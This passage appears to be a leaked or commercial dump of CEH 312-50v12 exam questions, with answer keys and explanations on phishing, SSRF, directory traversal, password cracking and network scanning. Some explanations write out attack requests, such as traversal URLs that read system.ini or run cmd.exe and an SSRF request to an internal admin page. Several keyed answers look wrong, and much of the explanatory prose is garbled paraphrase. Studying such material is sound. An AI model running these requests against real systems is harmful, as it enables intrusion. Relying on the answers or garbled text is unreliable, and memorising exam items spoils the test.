Pretty Good Privacy (PGP) is an encryption program that provides cryptographic privacy and authentication for data communication. PGP is used for signing,
encrypting, and decrypting texts, e-mails, files, directories, and whole disk partitions and to increase the security of e-mail communications.
PGP encryption uses a serial combination of hashing, data compression, symmetric-key cryptography, and finally public-key cryptography; each step uses one of
several supported algorithms. Each public key is bound to a username or an e-mail address.
https://en.wikipedia.org/wiki/Public-key_cryptography
Public key encryption uses two different keys. One key is used to encrypt the information and the other is used to decrypt the information. Sometimes this is
referred to as asymmetric encryption because two keys are required to make the system and/or process work securely. One key is known as the public key and
should be shared by the owner with anyone who will be securely communicating with the key owner. However, the owner’s secret key is not to be shared and
considered a private key. If the private key is shared with unauthorized recipients, the encryption mechanisms protecting the information must be considered
compromised.

NEW QUESTION 142
- (Exam Topic 2)
You receive an e-mail like the one shown below. When you click on the link contained in the mail, you are redirected to a website seeking you to download free
Anti-Virus software.
Dear valued customers,
We are pleased to announce the newest version of Antivirus 2010 for Windows which will probe you with total security against the latest spyware, malware,
viruses, Trojans and other online threats. Simply visit the link below and enter your antivirus code:

or you may contact us at the following address: Media Internet Consultants, Edif. Neptuno, Planta
Baja, Ave. Ricardo J. Alfaro, Tumba Muerto, n/a Panama
How will you determine if this is Real Anti-Virus or Fake Anti-Virus website?

A. Look at the website design, if it looks professional then it is a Real Anti-Virus website
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B. Connect to the site using SSL, if you are successful then the website is genuine
C. Search using the URL and Anti-Virus product name into Google and lookout for suspicious warnings against this site
D. Download and install Anti-Virus software from this suspicious looking site, your Windows 7 will prompt you and stop the installation if the downloaded file is a
malware
E. Download and install Anti-Virus software from this suspicious looking site, your Windows 7 will prompt you and stop the installation if the downloaded file is a
malware

Answer: C

NEW QUESTION 143
- (Exam Topic 2)
in the Common Vulnerability Scoring System (CVSS) v3.1 severity ratings, what range does medium vulnerability fall in?

A. 3.0-6.9
B. 40-6.0
C. 4.0-6.9
D. 3.9-6.9

Answer: C

Explanation: 

NEW QUESTION 148
- (Exam Topic 2)
John is an incident handler at a financial institution. His steps in a recent incident are not up to the standards of the company. John frequently forgets some steps
and procedures while handling responses as they are very stressful to perform. Which of the following actions should John take to overcome this problem with the
least administrative effort?

A. Create an incident checklist.
B. Select someone else to check the procedures.
C. Increase his technical skills.
D. Read the incident manual every time it occurs.

Answer: C

NEW QUESTION 150
- (Exam Topic 2)
Taylor, a security professional, uses a tool to monitor her company's website, analyze the website's traffic, and track the geographical location of the users visiting
the company's website. Which of the following tools did Taylor employ in the above scenario?

A. WebSite Watcher
B. web-Stat
C. Webroot
D. WAFW00F

Answer: B

Explanation: 
Increase your web site’s performance and grow! Add Web-Stat to your site (it’s free!) and watch individuals act together with your pages in real time.
Learn how individuals realize your web site. Get details concerning every visitor’s path through your web site and track pages that flip browsers into consumers.
One-click install. observe locations, in operation systems, browsers and screen sizes and obtain alerts for new guests and conversions

NEW QUESTION 152
- (Exam Topic 2)
In the context of Windows Security, what is a 'null' user?

A. A user that has no skills
B. An account that has been suspended by the admin
C. A pseudo account that has no username and password
D. A pseudo account that was created for security administration purpose

Answer: C
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NEW QUESTION 156
- (Exam Topic 2)
George is a security professional working for iTech Solutions. He was tasked with securely transferring sensitive data of the organization between industrial
systems. In this process, he used a short-range communication protocol based on the IEEE 203.15.4 standard. This protocol is used in devices that transfer data
infrequently at a low rate in a restricted area, within a range of 10-100 m. What is the short-range wireless communication technology George employed in the
above scenario?

A. MQTT
B. LPWAN
C. Zigbee
D. NB-IoT

Answer: C

Explanation: 
Zigbee could be a wireless technology developed as associate open international normal to deal with the unique desires of affordable, low-power wireless IoT
networks. The Zigbee normal operates on the IEEE 802.15.4 physical radio specification and operates in unauthorised bands as well as a pair of.4 GHz, 900 MHz
and 868 MHz.
The 802.15.4 specification upon that the Zigbee stack operates gained confirmation by the Institute of Electrical and physical science Engineers (IEEE) in 2003.
The specification could be a packet-based radio protocol supposed for affordable, battery-operated devices. The protocol permits devices to speak in an
exceedingly kind of network topologies and may have battery life lasting many years.
The Zigbee three.0 Protocol
The Zigbee protocol has been created and ratified by member corporations of the Zigbee Alliance.Over three hundred leading semiconductor makers, technology
corporations, OEMs and repair corporations comprise the Zigbee Alliance membership. The Zigbee protocol was designed to supply associate easy-to-use
wireless information answer characterised by secure, reliable wireless network architectures.
THE ZIGBEE ADVANTAGE
The Zigbee 3.0 protocol is intended to speak information through rip-roaring RF environments that area unit common in business and industrial applications.
Version 3.0 builds on the prevailing Zigbee normal however unifies the market-specific application profiles to permit all devices to be wirelessly connected within
the same network, no matter their market designation and performance. what is more, a Zigbee 3.0 certification theme ensures the ability of product from
completely different makers. Connecting Zigbee three.0 networks to the information science domain unveil observance and management from devices like
smartphones and tablets on a local area network or WAN, as well as the web, and brings verity net of Things to fruition.
Zigbee protocol options include:

 Support for multiple network topologies like point-to-point, point-to-multipoint and mesh networks

 Low duty cycle – provides long battery life

 Low latency

 Direct Sequence unfold Spectrum (DSSS)

 Up to 65,000 nodes per network

 128-bit AES encryption for secure information connections

 Collision avoidance, retries and acknowledgements
This is another short-range communication protocol based on the IEEE 203.15.4 standard. Zig-Bee is used in devices that transfer data infrequently at a low rate in
a restricted area and within a range of 10–100 m.

NEW QUESTION 158
- (Exam Topic 2)
OpenSSL on Linux servers includes a command line tool for testing TLS. What is the name of the tool and the correct syntax to connect to a web server?

A. openssl s_client -site www.website.com:443
B. openssl_client -site www.website.com:443
C. openssl s_client -connect www.website.com:443
D. openssl_client -connect www.website.com:443

Answer: C

NEW QUESTION 159
- (Exam Topic 2)
Which type of sniffing technique is generally referred as MiTM attack?
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A. Password Sniffing
B. ARP Poisoning
C. Mac Flooding
D. DHCP Sniffing

Answer: B

NEW QUESTION 160
- (Exam Topic 2)
Windows LAN Manager (LM) hashes are known to be weak.
Which of the following are known weaknesses of LM? (Choose three.)

A. Converts passwords to uppercase.
B. Hashes are sent in clear text over the network.
C. Makes use of only 32-bit encryption.
D. Effective length is 7 characters.

Answer: ABD

NEW QUESTION 163
- (Exam Topic 2)
Study the snort rule given below and interpret the rule. alert tcp any any --> 192.168.1.0/24 111 (content:"|00 01 86 a5|"; msG. "mountd access";)

A. An alert is generated when a TCP packet is generated from any IP on the 192.168.1.0 subnet and destined to any IP on port 111
B. An alert is generated when any packet other than a TCP packet is seen on the network and destined for the 192.168.1.0 subnet
C. An alert is generated when a TCP packet is originated from port 111 of any IP address to the 192.168.1.0 subnet
D. An alert is generated when a TCP packet originating from any IP address is seen on the network and destined for any IP address on the 192.168.1.0 subnet on
port 111

Answer: D

NEW QUESTION 164
- (Exam Topic 2)
What is the purpose of DNS AAAA record?

A. Authorization, Authentication and Auditing record
B. Address prefix record
C. Address database record
D. IPv6 address resolution record

Answer: D

NEW QUESTION 169
- (Exam Topic 2)
Jason, an attacker, targeted an organization to perform an attack on its Internet-facing web server with the intention of gaining access to backend servers, which
are protected by a firewall. In this process, he used a URL https://xyz.com/feed.php?url:externaIsile.com/feed/to to obtain a remote feed and altered the URL input
to the local host to view all the local resources on the target server. What is the type of attack Jason performed In the above scenario?

A. website defacement
B. Server-side request forgery (SSRF) attack
C. Web server misconfiguration
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D. web cache poisoning attack

Answer: B

Explanation: 
Server-side request forgery (also called SSRF) is a net security vulnerability that allows an assaulter to induce the server-side application to make http requests to
associate arbitrary domain of the attacker’s choosing.
In typical SSRF examples, the attacker might cause the server to make a connection back to itself, or to other web-based services among the organization’s
infrastructure, or to external third-party systems.
Another type of trust relationship that often arises with server-side request forgery is where the application server is able to interact with different back-end systems
that aren’t directly reachable by users. These systems typically have non-routable private informatics addresses. Since the back-end systems normally ordinarily
protected by the topology, they typically have a weaker security posture. In several cases, internal back-end systems contain sensitive functionality that may be
accessed while not authentication by anyone who is able to act with the systems.
In the preceding example, suppose there’s an body interface at the back-end url https://192.168.0.68/admin. Here, an attacker will exploit the SSRF vulnerability
to access the executive interface by submitting the following request:
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded Content-Length: 118 stockApi=http://192.168.0.68/admin

NEW QUESTION 174
- (Exam Topic 2)
While testing a web application in development, you notice that the web server does not properly ignore the “dot dot slash” (../) character string and instead
returns the file listing of a folder structure of the server.
What kind of attack is possible in this scenario?

A. Cross-site scripting
B. Denial of service
C. SQL injection
D. Directory traversal

Answer: D

Explanation: 
Appropriately controlling admittance to web content is significant for running a safe web worker. Index crossing or Path Traversal is a HTTP assault which permits
aggressors to get to limited catalogs and execute orders outside of the web worker’s root registry.
Web workers give two primary degrees of security instruments

 Access Control Lists (ACLs)

 Root index
An Access Control List is utilized in the approval cycle. It is a rundown which the web worker’s manager uses to show which clients or gatherings can get to,
change or execute specific records on the worker, just as other access rights.
The root registry is a particular index on the worker record framework in which the clients are kept. Clients can’t get to anything over this root.
For instance: the default root registry of IIS on Windows is C:\Inetpub\wwwroot and with this arrangement, a client doesn’t approach C:\Windows yet approaches
C:\Inetpub\wwwroot\news and some other indexes and documents under the root catalog (given that the client is confirmed by means of the ACLs).
The root index keeps clients from getting to any documents on the worker, for example, C:\WINDOWS/system32/win.ini on Windows stages and the/and so
on/passwd record on Linux/UNIX stages.
This weakness can exist either in the web worker programming itself or in the web application code.
To play out a registry crossing assault, all an assailant requires is an internet browser and some information on where to aimlessly discover any default documents
and registries on the framework.
What an assailant can do if your site is defenselessWith a framework defenseless against index crossing, an aggressor can utilize this weakness to venture out of
the root catalog and access different pieces of the record framework. This may enable the assailant to see confined documents, which could give the aggressor
more data needed to additional trade off the framework.
Contingent upon how the site access is set up, the aggressor will execute orders by mimicking himself as the client which is related with “the site”. Along these
lines everything relies upon what the site client has been offered admittance to in the framework.
Illustration of a Directory Traversal assault by means of web application codeIn web applications with dynamic pages, input is generally gotten from programs
through GET or POST solicitation techniques. Here is an illustration of a HTTP GET demand URL
GET
http://test.webarticles.com/show.asp?view=oldarchive.html HTTP/1.1 Host: test.webarticles.com
With this URL, the browser requests the dynamic page show.asp from the server and with it also sends the parameter view with the value of oldarchive.html. When
this request is executed on the web
server, show.asp retrieves the file oldarchive.html from the server’s file system, renders it and then sends back to the browser which displays it to the user. The
attacker would assume that show.asp can retrieve files from the file system and sends the following custom URL.
GET
http://test.webarticles.com/show.asp?view=../../../../../Windows/system.ini HTTP/1.1 Host: test.webarticles.com
This will cause the dynamic page to retrieve the file system.ini from the file system and display it to the user The expression ../ instructs the system to go one
directory up which is commonly used as an operating system directive. The attacker has to guess how many directories he has to go up to find the Windows folder
on the system, but this is easily done by trial and error.
Example of a Directory Traversal attack via web serverApart from vulnerabilities in the code, even the web server itself can be open to directory traversal attacks.
The problem can either be incorporated into the web server software or inside some sample script files left available on the server.
The vulnerability has been fixed in the latest versions of web server software, but there are web servers online which are still using older versions of IIS and
Apache which might be open to directory traversal attacks. Even though you might be using a web server software version that has fixed this vulnerability, you
might still have some sensitive default script directories exposed which are well known to hackers.
For example, a URL request which makes use of the scripts directory of IIS to traverse directories and execute a command can be
GET
http://server.com/scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c:\ HTTP/1.1 Host: server.com
The request would return to the user a list of all files in the C:\ directory by executing the cmd.exe comm shell file and run the command dir c:\ in the shell. The
%5c expression that is in the URL request is a we server escape code which is used to represent normal characters. In this case %5c represents the character \
Newer versions of modern web server software check for these escape codes and do not let them through. Some older versions however, do not filter out these
codes in the root directory enforcer and will let the attackers execute such commands.

NEW QUESTION 177
- (Exam Topic 2)

Passing Certification Exams Made Easy visit - https://www.2PassEasy.com



Welcome to download the Newest 2passeasy 312-50v12 dumps
https://www.2passeasy.com/dumps/312-50v12/ (503 New Questions)

Which utility will tell you in real time which ports are listening or in another state?

A. Netstat
B. TCPView
C. Nmap
D. Loki

Answer: B

NEW QUESTION 178
- (Exam Topic 2)
These hackers have limited or no training and know how to use only basic techniques or tools. What kind of hackers are we talking about?

A. Black-Hat Hackers A
B. Script Kiddies
C. White-Hat Hackers
D. Gray-Hat Hacker

Answer: B

Explanation: 
Script Kiddies: These hackers have limited or no training and know how to use only basictechniques or tools. Even then they may not understand any or all of what
they are doing.

NEW QUESTION 183
- (Exam Topic 2)
You work for Acme Corporation as Sales Manager. The company has tight network security restrictions. You are trying to steal data from the company's Sales
database (Sales.xls) and transfer them to your home computer. Your company filters and monitors traffic that leaves from the internal network to the Internet. How
will you achieve this without raising suspicion?

A. Encrypt the Sales.xls using PGP and e-mail it to your personal gmail account
B. Package the Sales.xls using Trojan wrappers and telnet them back your home computer
C. You can conceal the Sales.xls database in another file like photo.jpg or other files and send it out in aninnocent looking email or file transfer using
Steganography techniques
D. Change the extension of Sales.xls to sales.txt and upload them as attachment to your hotmail account

Answer: C

NEW QUESTION 185
- (Exam Topic 2)
Steven connected his iPhone to a public computer that had been infected by Clark, an attacker. After establishing the connection with the public computer, Steven
enabled iTunes WI-FI sync on the computer so that the device could continue communication with that computer even after being physically disconnected. Now,
Clark gains access to Steven’s iPhone through the infected computer and is able to monitor and read all of Steven’s activity on the iPhone, even after the device
is out of the communication zone.
Which of the following attacks is performed by Clark in above scenario?

A. IOS trustjacking
B. lOS Jailbreaking
C. Exploiting SS7 vulnerability
D. Man-in-the-disk attack

Answer: A

Explanation: 
An iPhone client’s most noticeably terrible bad dream is to have somebody oversee his/her gadget, including the capacity to record and control all action without
waiting be in a similar room. In this blog entry, we present another weakness called “Trustjacking”, which permits an aggressor to do precisely that.
This weakness misuses an iOS highlight called iTunes Wi-Fi sync, which permits a client to deal with their iOS gadget without genuinely interfacing it to their PC. A
solitary tap by the iOS gadget proprietor when the two are associated with a similar organization permits an assailant to oversee the gadget. Furthermore, we will
stroll through past related weaknesses and show the progressions that iPhone has made to alleviate them, and why these are adequately not to forestall
comparative assaults.
After interfacing an iOS gadget to another PC, the clients are being found out if they trust the associated PC or not. Deciding to believe the PC permits it to speak
with the iOS gadget by means of the standard iTunes APIs.
This permits the PC to get to the photographs on the gadget, perform reinforcement, introduce applications and considerably more, without requiring another
affirmation from the client and with no recognizable sign. Besides, this permits enacting the “iTunes Wi-Fi sync” highlight, which makes it conceivable to proceed
with this sort of correspondence with the gadget even after it has been detached from the PC, as long as the PC and the iOS gadget are associated with a similar
organization. It is intriguing to take note of that empowering “iTunes Wi-Fi sync” doesn’t need the casualty’s endorsement and can be directed simply from the
PC side.
Getting a live stream of the gadget’s screen should be possible effectively by consistently requesting screen captures and showing or recording them distantly.
It is imperative to take note of that other than the underlying single purpose of disappointment, approving the vindictive PC, there is no other component that
forestalls this proceeded with access. Likewise, there isn’t anything that informs the clients that by approving the PC they permit admittance to their gadget even in
the wake of detaching the USB link.

NEW QUESTION 189
- (Exam Topic 2)
John, a disgruntled ex-employee of an organization, contacted a professional hacker to exploit the organization. In the attack process, the professional hacker
Installed a scanner on a machine belonging to one of the vktims and scanned several machines on the same network to Identify vulnerabilities to perform further
exploitation. What is the type of vulnerability assessment tool employed by John in the above scenario?

A. Proxy scanner
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B. Agent-based scanner
C. Network-based scanner
D. Cluster scanner

Answer: C

Explanation: 
Network-based scanner
A network-based vulnerability scanner, in simplistic terms, is the process of identifying loopholes on a computer’s network or IT assets, which hackers and threat
actors can exploit. By implementing this process, one can successfully identify their organization’s current risk(s). This is not where the buck stops; one can also
verify the effectiveness of your system's security measures while improving internal and external defenses. Through this review, an organization is well equipped to
take an extensive inventory of all systems, including operating systems, installed software, security patches, hardware, firewalls, anti-virus software, and much
more.
Agent-based scanner
Agent-based scanners make use of software scanners on each and every device; the results of the scans are reported back to the central server. Such scanners
are well equipped to find and report out on a range of vulnerabilities.
NOTE: This option is not suitable for us, since for it to work, you need to install a special agent on each computer before you start collecting data from them.

NEW QUESTION 192
- (Exam Topic 2)
Bob, your senior colleague, has sent you a mail regarding a deal with one of the clients. You are requested to accept the offer and you oblige. After 2 days. Bob
denies that he had ever sent a mail. What do you want to ""know"" to prove yourself that it was Bob who had send a mail?

A. Authentication
B. Confidentiality
C. Integrity
D. Non-Repudiation

Answer: D

Explanation: 
Non-repudiation is the assurance that someone cannot deny the validity of something. Non-repudiation is a legal concept that is widely used in information security
and refers to a service, which provides proof of the origin of data and the integrity of the data. In other words, non-repudiation makes it very difficult to successfully
deny who/where a message came from as well as the authenticity and integrity of that message.

NEW QUESTION 194
- (Exam Topic 2)
In this attack, a victim receives an e-mail claiming from PayPal stating that their account has been disabled and confirmation is required before activation. The
attackers then scam to collect not one but two credit card numbers, ATM PIN number and other personal details. Ignorant users usually fall prey to this scam.
Which of the following statement is incorrect related to this attack?

A. Do not reply to email messages or popup ads asking for personal or financial information
B. Do not trust telephone numbers in e-mails or popup ads
C. Review credit card and bank account statements regularly
D. Antivirus, anti-spyware, and firewall software can very easily detect these type of attacks
E. Do not send credit card numbers, and personal or financial information via e-mail

Answer: D

NEW QUESTION 199
- (Exam Topic 2)
Password cracking programs reverse the hashing process to recover passwords. (True/False.)

A. True
B. False

Answer: B

NEW QUESTION 200
- (Exam Topic 2)
You are programming a buffer overflow exploit and you want to create a NOP sled of 200 bytes in the program exploit.c

What is the hexadecimal value of NOP instruction?

A. 0x60
B. 0x80
C. 0x70
D. 0x90

Answer: D

NEW QUESTION 202
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- (Exam Topic 2)
Techno Security Inc. recently hired John as a penetration tester. He was tasked with identifying open ports in the target network and determining whether the ports
are online and any firewall rule sets are encountered. John decided to perform a TCP SYN ping scan on the target network. Which of the following Nmap
commands must John use to perform the TCP SYN ping scan?

A. nmap -sn -pp < target ip address >
B. nmap -sn -PO < target IP address >
C. nmap -sn -PS < target IP address >
D. nmap -sn -PA < target IP address >

Answer: C

Explanation: 
https://hub.packtpub.com/discovering-network-hosts-with-tcp-syn-and-tcp-ack-ping-scans-in-nmaptutorial/

NEW QUESTION 205
- (Exam Topic 2)
You are analysing traffic on the network with Wireshark. You want to routinely run a cron job which will run the capture against a specific set of IPs -
192.168.8.0/24. What command you would use?

A. wireshark --fetch ''192.168.8*''
B. wireshark --capture --local masked 192.168.8.0 ---range 24
C. tshark -net 192.255.255.255 mask 192.168.8.0
D. sudo tshark -f''net 192 .68.8.0/24''

Answer: D

NEW QUESTION 207
- (Exam Topic 2)
Susan, a software developer, wants her web API to update other applications with the latest information. For this purpose, she uses a user-defined HTTP tailback
or push APIs that are raised based on trigger events: when invoked, this feature supplies data to other applications so that users can instantly receive real-time
Information.
Which of the following techniques is employed by Susan?

A. web shells
B. Webhooks
C. REST API
D. SOAP API

Answer: B

Explanation: 
Webhooks are one of a few ways internet applications will communicate with one another.
It allows you to send real-time data from one application to another whenever a given event happens.
For example, let’s say you’ve created an application using the Foursquare API that tracks when people check into your restaurant. You ideally wish to be able to
greet customers by name and provide a complimentary drink when they check in.
What a webhook will is notify you any time someone checks in, therefore you’d be able to run any processes that you simply had in your application once this
event is triggered.
The data is then sent over the web from the application wherever the event originally occurred, to the receiving application that handles the data.
Here’s a visual representation of what that looks like:

A webhook url is provided by the receiving application, and acts as a phone number that the other application will call once an event happens.
Only it’s more complicated than a phone number, because data about the event is shipped to the webhook url in either JSON or XML format. this is known as the
“payload.”
Here’s an example of what a webhook url looks like with the payload it’s carrying:

What are Webhooks? Webhooks are user-defined HTTP callback or push APIs that are raised based on events triggered, such as comment received on a post
and pushing code to the registry. A webhook allows an application to update other applications with the latest information. Once invoked, it supplies data to the
other applications, which means that users instantly receive real-time information. Webhooks are sometimes called “Reverse APIs” as they provide what is
required for API specification, and the developer should create an API to use a webhook. A webhook is an API concept that is also used to send text messages
and notifications to mobile numbers or email addresses from an application when a specific event is triggered. For instance, if you search for something in the
online store and the required item is out of stock, you click on the “Notify me” bar to get an alert from the application when that item is available for purchase.
These notifications from the applications are usually sent through webhooks.

NEW QUESTION 210
- (Exam Topic 2)
You are a penetration tester tasked with testing the wireless network of your client Brakeme SA. You are attempting to break into the wireless network with the
SSID "Brakeme-lnternal." You realize that this network uses WPA3 encryption, which of the following vulnerabilities is the promising to exploit?
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A. Dragonblood
B. Cross-site request forgery
C. Key reinstallation attack
D. AP Myconfiguration

Answer: A

Explanation: 
Dragonblood allows an attacker in range of a password-protected Wi-Fi network to get the password and gain access to sensitive information like user credentials,
emails and mastercard numbers. consistent with the published report:“The WPA3 certification aims to secure Wi-Fi networks, and provides several advantages
over its predecessor WPA2, like protection against offline dictionary attacks and forward secrecy. Unfortunately, we show that WPA3 is suffering from several
design flaws, and analyze these flaws both theoretically and practically. Most prominently, we show that WPA3’s Simultaneous Authentication of Equals (SAE)
handshake, commonly referred to as Dragonfly, is suffering from password partitioning attacks.”Our Wi-Fi researchers at WatchGuard are educating businesses
globally that WPA3 alone won’t stop the Wi-Fi hacks that allow attackers to steal information over the air (learn more in our recent blog post on the topic). These
Dragonblood vulnerabilities impact alittle amount of devices that were released with WPA3 support, and makers are currently making patches available. one
among the most important takeaways for businesses of all sizes is to know that a long-term fix might not be technically feasible for devices with lightweight
processing capabilities like IoT and embedded systems. Businesses got to consider adding products that enable a Trusted Wireless Environment for all kinds of
devices and users alike.Recognizing that vulnerabilities like KRACK and Dragonblood require attackers to initiate these attacks by bringing an “Evil Twin” Access
Point or a Rogue Access Point into a Wi-Fi environment, we’ve been that specialize in developing Wi-Fi security solutions that neutralize these threats in order
that these attacks can never occur. The Trusted Wireless Environment framework protects against the “Evil Twin” Access Point and Rogue Access Point. one
among these hacks is required to initiate the 2 downgrade or side-channel attacks referenced in Dragonblood.What’s next? WPA3 is an improvement over WPA2
Wi-Fi encryption protocol, however, as we predicted, it still doesn’t provide protection from the six known Wi-Fi threat categories. It’s highly likely that we’ll see
more WPA3 vulnerabilities announced within the near future.To help reduce Wi-Fi vulnerabilities, we’re asking all of you to hitch the Trusted Wireless Environment
movement and advocate for a worldwide security standard for Wi-Fi.

NEW QUESTION 215
- (Exam Topic 2)
David is a security professional working in an organization, and he is implementing a vulnerability management program in the organization to evaluate and control
the risks and vulnerabilities in its IT infrastructure. He is currently executing the process of applying fixes on vulnerable systems to reduce the impact and severity
of vulnerabilities. Which phase of the vulnerability-management life cycle is David currently in?

A. verification
B. Risk assessment
C. Vulnerability scan
D. Remediation

Answer: D

NEW QUESTION 216
- (Exam Topic 2)
You have retrieved the raw hash values from a Windows 2000 Domain Controller. Using social engineering, you come to know that they are enforcing strong
passwords. You understand that all users are required to use passwords that are at least 8 characters in length. All passwords must also use 3 of the 4 following
categories: lower case letters, capital letters, numbers and special characters. With your existing knowledge of users, likely user account names and the possibility
that they will choose the easiest passwords possible, what would be the fastest type of password cracking attack you can run against these hash values and still
get results?

A. Online Attack
B. Dictionary Attack
C. Brute Force Attack
D. Hybrid Attack

Answer: D

NEW QUESTION 221
- (Exam Topic 2)
While browsing his Facebook teed, Matt sees a picture one of his friends posted with the caption. "Learn more about your friends!", as well as a number of
personal questions. Matt is suspicious and texts his friend, who confirms that he did indeed post it. With assurance that the post is legitimate. Matt responds to the
questions on the post, a few days later. Mates bank account has been accessed, and the password has been changed. What most likely happened?

A. Matt inadvertently provided the answers to his security questions when responding to the post.
B. Matt's bank-account login information was brute forced.
C. Matt Inadvertently provided his password when responding to the post.
D. Matt's computer was infected with a keylogger.

Answer: A

NEW QUESTION 222
- (Exam Topic 2)
Bob, an attacker, has managed to access a target loT device. He employed an online tool to gather information related to the model of the loT device and the
certifications granted to it. Which of the following tools did Bob employ to gather the above Information?

A. search.com
B. EarthExplorer
C. Google image search
D. FCC ID search

Answer: D

Explanation: 
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Footprinting techniques are used to collect basic information about the target IoT and OT platforms to exploit them. Information collected through footprinting
techniques ncludes IP address, hostname, ISP, device location, banner of the target IoT device, FCC ID information, certification granted to the device, etc. pg.
5052 ECHv11 manual
https://en.wikipedia.org/wiki/FCC_mark
An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission. For legal sale of wireless deices in
the US, manufacturers must:
· Have the device evaluated by an independent lab to ensure it conforms to FCC standards
· Provide documentation to the FCC of the lab results
· Provide User Manuals, Documentation, and Photos relating to the device
· Digitally or physically label the device with the unique identifier provided by the FCC (upon approved application)
The FCC gets its authourity from Title 47 of the Code of Federal Regulations (47 CFR). FCC IDs are required for all wireless emitting devices sold in the USA. By
searching an FCC ID, you can find details on the wireless operating frequency (including strength), photos of the device, user manuals for the device, and SAR
reports on the wireless emissions

NEW QUESTION 226
- (Exam Topic 2)
Every company needs a formal written document which spells out to employees precisely what they are allowed to use the company's systems for, what is
prohibited, and what will happen to them if they break the rules. Two printed copies of the policy should be given to every employee as soon as possible after they
join the organization. The employee should be asked to sign one copy, which should be safely filed by the company. No one should be allowed to use the
company's computer systems until they have signed the policy in acceptance of its terms.
What is this document called?

A. Information Audit Policy (IAP)
B. Information Security Policy (ISP)
C. Penetration Testing Policy (PTP)
D. Company Compliance Policy (CCP)

Answer: B

NEW QUESTION 229
- (Exam Topic 2)
Attacker Rony Installed a rogue access point within an organization's perimeter and attempted to Intrude into its internal network. Johnson, a security auditor,
identified some unusual traffic in the internal network that is aimed at cracking the authentication mechanism. He immediately turned off the targeted network and
tested for any weak and outdated security mechanisms that are open to attack. What is the type of vulnerability assessment performed by Johnson in the above
scenario?

A. Distributed assessment
B. Wireless network assessment
C. Most-based assessment
D. Application assessment

Answer: B

Explanation: 
Expanding your network capabilities are often done well using wireless networks, but it also can be a source of harm to your data system . Deficiencies in its
implementations or configurations can allow tip to be accessed in an unauthorized manner.This makes it imperative to closely monitor your wireless network while
also conducting periodic Wireless Network assessment.It identifies flaws and provides an unadulterated view of exactly how vulnerable your systems are to
malicious and unauthorized accesses.Identifying misconfigurations and inconsistencies in wireless implementations and rogue access points can improve your
security posture and achieve compliance with regulatory frameworks.

NEW QUESTION 231
- (Exam Topic 2)
An organization is performing a vulnerability assessment tor mitigating threats. James, a pen tester, scanned the organization by building an inventory of the
protocols found on the organization's machines to detect which ports are attached to services such as an email server, a web server or a database server. After
identifying the services, he selected the vulnerabilities on each machine and started executing only the relevant tests. What is the type of vulnerability assessment
solution that James employed in the above scenario?

A. Product-based solutions
B. Tree-based assessment
C. Service-based solutions
D. inference-based assessment

Answer: D

Explanation: 
In an inference-based assessment, scanning starts by building an inventory of the protocols found on the machine. After finding a protocol, the scanning process
starts to detect which ports are attached to services, such as an email server, web server, or database server. After finding services, it selects vulnerabilities on
each machine and starts to execute only those relevant tests.

NEW QUESTION 235
- (Exam Topic 2)
Annie, a cloud security engineer, uses the Docker architecture to employ a client/server model in the application she is working on. She utilizes a component that
can process API requests and handle various Docker objects, such as containers, volumes. Images, and networks. What is the component of the Docker
architecture used by Annie in the above scenario?

A. Docker client
B. Docker objects
C. Docker daemon
D. Docker registries
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Answer: C

Explanation: 
Docker uses a client-server design. The docker client talks to the docker daemon, that will the work of building, running, and distributing your docker containers.
The docker client and daemon will run on the same system, otherwise you will connect a docker consumer to a remote docker daemon. The docker consumer and
daemon communicate using a REST API, over OS sockets or a network interface.

The docker daemon (dockerd) listens for docker API requests and manages docker objects like pictures, containers, networks, and volumes. A daemon may
communicate with other daemons to manage docker services.

NEW QUESTION 237
- (Exam Topic 2)
Clark, a professional hacker, was hired by an organization lo gather sensitive Information about its competitors surreptitiously. Clark gathers the server IP address
of the target organization using Whole footprinting. Further, he entered the server IP address as an input to an online tool to retrieve information such as the
network range of the target organization and to identify the network topology and operating system used in the network. What is the online tool employed by Clark
in the above scenario?

A. AOL
B. ARIN
C. DuckDuckGo
D. Baidu

Answer: B

Explanation: 
https://search.arin.net/rdap/?query=199.43.0.43

NEW QUESTION 239
- (Exam Topic 2)
In the context of password security, a simple dictionary attack involves loading a dictionary file (a text file full of dictionary words) into a cracking application such
as L0phtCrack or John the Ripper, and running it against user accounts located by the application. The larger the word and word fragment selection, the more
effective the dictionary attack is. The brute force method is the most inclusive, although slow. It usually tries every possible letter and number combination in its
automated exploration. If you would use both brute force and dictionary methods combined together to have variation of words, what would you call such an
attack?

A. Full Blown
B. Thorough
C. Hybrid
D. BruteDics

Answer: C

NEW QUESTION 241
- (Exam Topic 2)
During the enumeration phase. Lawrence performs banner grabbing to obtain information such as OS details and versions of services running. The service that he
enumerated runs directly on TCP port 445.
Which of the following services is enumerated by Lawrence in this scenario?

A. Server Message Block (SMB)
B. Network File System (NFS)
C. Remote procedure call (RPC)
D. Telnet

Answer: A

Explanation: 
Worker Message Block (SMB) is an organization document sharing and information texture convention. SMB is utilized by billions of gadgets in a different
arrangement of working frameworks, including Windows, MacOS, iOS , Linux, and Android. Customers use SMB to get to information on workers. This permits
sharing of records, unified information the board, and brought down capacity limit needs for cell phones. Workers additionally use SMB as a feature of the Software-
characterized Data Center for outstanding burdens like grouping and replication.
Since SMB is a far off record framework, it requires security from assaults where a Windows PC may be fooled into reaching a pernicious worker running inside a
confided in organization or to a far off worker outside the organization edge. Firewall best practices and arrangements can upgrade security keeping malevolent
traffic from leaving the PC or its organization.
For Windows customers and workers that don’t have SMB shares, you can obstruct all inbound SMB traffic utilizing the Windows Defender Firewall to keep far off
associations from malignant or bargained gadgets. In the Windows Defender Firewall, this incorporates the accompanying inbound principles.
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You should also create a new blocking rule to override any other inbound firewall rules. Use the following suggested settings for any Windows clients or servers
that do not host SMB Shares:

 Name: Block all inbound SMB 445

 Description: Blocks all inbound SMB TCP 445 traffic. Not to be applied to domain controllers or computers that host SMB shares.

 Action: Block the connection

 Programs: All

 Remote Computers: Any

 Protocol Type: TCP

 Local Port: 445

 Remote Port: Any

 Profiles: All

 Scope (Local IP Address): Any

 Scope (Remote IP Address): Any

 Edge Traversal: Block edge traversal
You must not globally block inbound SMB traffic to domain controllers or file servers. However, you can restrict access to them from trusted IP ranges and devices
to lower their attack surface. They should also be restricted to Domain or Private firewall profiles and not allow Guest/Public traffic.

NEW QUESTION 246
- (Exam Topic 2)
While scanning with Nmap, Patin found several hosts which have the IP ID of incremental sequences. He then decided to conduct: nmap -Pn -p- -si
